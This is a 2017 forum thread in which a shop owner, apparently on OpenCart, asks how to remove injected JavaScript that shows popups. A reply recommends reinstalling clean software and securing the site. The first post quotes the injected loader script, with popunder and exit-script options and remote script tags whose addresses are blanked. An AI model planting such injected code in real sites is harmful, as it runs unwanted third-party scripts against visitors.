Page 1 of 1

Carnt get rid of malware attack

Posted: Sun Jul 30, 2017 7:45 pm
by motofox
Hi, my site has been injected with a java script code hidden on everypage that causes popups for users.

my host advised me that it was slq injected and i needed to change the database passwords which i have done, then rolled back the database to one that was clean from a previous date and it was okay for a couple of days but now its back.

below is a sample of the code that appears when i press the source button in oc in the discription.
Can anyone advise how to stop this happening in a not too technical format, im not familiar with code.

<p><script type="text/javascript">//<![CDATA[
(function() {
var configuration = {
"token": "11f0dc1ed8453e409e04d86bea962f34",
"exitScript": {
"enabled": true
"popUnder": {
"enabled": true
var script = document.createElement('script');
script.async = true;
script.src = '//';
script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);};
var entry = document.getElementsByTagName('script')[0];
entry.parentNode.insertBefore(script, entry);
//]]></script><script data-cfasync='false' type='text/javascript' src='//'></script><script type="text/javascript" src="//"></script><script async="async" type="text/javascript" src="//"></script></p>

Re: Carnt get rid of malware attack

Posted: Mon Jul 31, 2017 2:32 am
Well, your Problem cannot be solved by some Forum Assistance, you'll need
a Professional, looking into your Site, Code, and DB, to find out first, how and why
someone could be able, to implement bad code on your Site.

I would rather advise you, to clean out the existing Shop Directory on the Server,
and then, upload a clean new piece of the same Software, after downloading, and
checking the DB for it's Content first. And then, make sure, that the new Software is
secured according standards, by possible use of some existing free Extensions,
like Secure Admin, and correctly CHMOD'ing Subs and Files, e.t.c., and also removing
possibly existing USER-UPLOAD Functions and such open Doors, always just
potentially endangering Systems. :'(

Just to give you some Ideas. But if you need assistance, just MAKE SURE, not to select
anyone, Web-UNKNOWN by a real Name, Address and a personally registered Site, it's
not worth the Risk, one takes, it one deals with people, hiding behind trees and bushes,
for what reason ever...
Good Luck ! ;)